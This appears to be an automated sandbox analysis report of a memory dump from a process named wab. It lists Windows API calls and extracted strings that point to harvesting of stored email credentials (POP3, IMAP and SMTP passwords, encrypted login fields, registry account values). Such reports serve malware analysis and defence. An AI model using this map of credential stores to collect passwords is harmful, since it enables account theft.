                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 00406C45
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00406C52
                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040C0BB,?), ref: 00406C61
                                                                                                                                                                                                                    • GlobalFix.KERNEL32(00000000), ref: 00406C6E
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00406C77
                                                                                                                                                                                                                    • GlobalUnWire.KERNEL32(00000000), ref: 00406C80
                                                                                                                                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 00406C89
                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00406C99
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpystrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2315226746-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                                                                                    • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                                                                                    • API String ID: 3963849919-1658304561
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                    • String ID: E$ E$ E
                                                                                                                                                                                                                    • API String ID: 1865533344-1090515111
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0044269A
                                                                                                                                                                                                                    • _strncoll.MSVCRT ref: 004426AA
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00442726
                                                                                                                                                                                                                    • atoi.MSVCRT ref: 00442737
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00442763
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWide_strncollatoimemcpystrlen
                                                                                                                                                                                                                    • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                                                                                                                                                    • API String ID: 1864335961-3210201812
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                                                                                                                                                    • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                                                                                                                    • API String ID: 1714764973-479759155
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E6BB
                                                                                                                                                                                                                      • Part of subcall function 0040690E: memset.MSVCRT ref: 00406930
                                                                                                                                                                                                                      • Part of subcall function 0040690E: strlen.MSVCRT ref: 0040693B
                                                                                                                                                                                                                      • Part of subcall function 0040690E: strlen.MSVCRT ref: 00406949
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E70C
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E728
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,%@,000000FF,?,00000104,?,?,?,?,?,?,0040EC25,?,00000000), ref: 0040E73F
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040EC25,?), ref: 0040E75E
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E7C0
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E7D5
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040E83A
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040E850
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040E866
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040E87C
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040E892
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040E8A8
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E8C2
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                                                                                                                    • String ID: $"$$$$$%@$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                                                                                                    • API String ID: 3137614212-1813914204
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _strcmpi$strlen$_strncoll$atoimemset$memcpy
                                                                                                                                                                                                                    • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$port$server$signon.signonfilename$true$type$useSecAuth$useremail$username
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040690E: memset.MSVCRT ref: 00406930
                                                                                                                                                                                                                      • Part of subcall function 0040690E: strlen.MSVCRT ref: 0040693B
                                                                                                                                                                                                                      • Part of subcall function 0040690E: strlen.MSVCRT ref: 00406949
                                                                                                                                                                                                                      • Part of subcall function 004086A5: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,0040EC43,?,00000000,?,?,?,?,?,?), ref: 004086C3
                                                                                                                                                                                                                      • Part of subcall function 004086A5: CloseHandle.KERNEL32(?,?), ref: 0040870D
                                                                                                                                                                                                                      • Part of subcall function 00408763: _mbsicmp.MSVCRT ref: 0040879D
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E123
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E138
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040E19F
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040E1B5
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040E1CB
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040E1E1
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040E1F7
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040E20A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E225
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E23C
                                                                                                                                                                                                                      • Part of subcall function 00406582: memset.MSVCRT ref: 004065A3
                                                                                                                                                                                                                      • Part of subcall function 00406582: memcmp.MSVCRT ref: 004065CD
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E29D
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E2B4
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E2CB
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040E2E6
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040E2FB
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040E310
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E326
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E33F
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E358
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E374
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                                                                                                                    • String ID: C@$encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0040FDA3
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040FDAF
                                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 0040FDBE
                                                                                                                                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 0040FDCA
                                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 0040FDD3
                                                                                                                                                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 0040FDDF
                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0040FDF1
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040FDFC
                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040FE10
                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040FE1E
                                                                                                                                                                                                                    • GetDC.USER32 ref: 0040FE57
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040FE97
                                                                                                                                                                                                                    • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 0040FEA8
                                                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 0040FEF5
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040FFB5
                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 0040FFC9
                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 0040FFE7
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 0041001D
                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041002D
                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041003B
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00410052
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0041005C
                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 004100A2
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004100AC
                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 004100E4
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                                                                                    • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004024E7
                                                                                                                                                                                                                      • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00402525
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 004025EF
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscpy$QueryValuememset
                                                                                                                                                                                                                    • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040285B
                                                                                                                                                                                                                      • Part of subcall function 00402994: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029C5
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00402895
                                                                                                                                                                                                                      • Part of subcall function 00402994: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004029F3
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040296D
                                                                                                                                                                                                                      • Part of subcall function 0041042B: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402928,?,?,?,?,00402928,?,?), ref: 0041044A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                                                                                                                                    • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 0040F600
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0040F618
                                                                                                                                                                                                                    • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040F637
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040F644
                                                                                                                                                                                                                    • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040F64D
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F675
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F695
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F6B3
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F6CC
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F6EA
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F703
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0040F70B
                                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040F730
                                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040F766
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F7BD
                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 0040F7CB
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040F7FA
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040F81C
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040F887
                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040F8A0
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0040F8AA
                                                                                                                                                                                                                    • SetFocus.USER32(00000000), ref: 0040F8B1
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • {Unknown}, xrefs: 0040F67A
                                                                                                                                                                                                                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040F881
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                                                                                                                                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                                                                                                    • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                                                                                                    • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003EE,00451398), ref: 00401273
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040128E
                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00408DE1: LoadMenuA.USER32(00000000), ref: 00408DE9
                                                                                                                                                                                                                      • Part of subcall function 00408DE1: sprintf.MSVCRT ref: 00408E0C
                                                                                                                                                                                                                    • SetMenu.USER32(?,00000000), ref: 0040BA7E
                                                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BAB1
                                                                                                                                                                                                                    • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BAC7
                                                                                                                                                                                                                    • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BB27
                                                                                                                                                                                                                    • LoadIconA.USER32(00000066,00000000), ref: 0040BB96
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040BBEE
                                                                                                                                                                                                                    • RegDeleteKeyA.ADVAPI32(80000001,0044551F), ref: 0040BC03
                                                                                                                                                                                                                    • SetFocus.USER32(?), ref: 0040BC29
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(004518C0), ref: 0040BC42
                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,004518C0), ref: 0040BC52
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040BC59
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040BC67
                                                                                                                                                                                                                    • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BCC3
                                                                                                                                                                                                                      • Part of subcall function 00404B82: strlen.MSVCRT ref: 00404B9F
                                                                                                                                                                                                                      • Part of subcall function 00404B82: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404BC3
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BD0E
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BD21
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040BD36
                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 0040BD5A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                                                                                                                                                    • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                                                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                                                                                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: sprintf$memset$_mbscpy
                                                                                                                                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
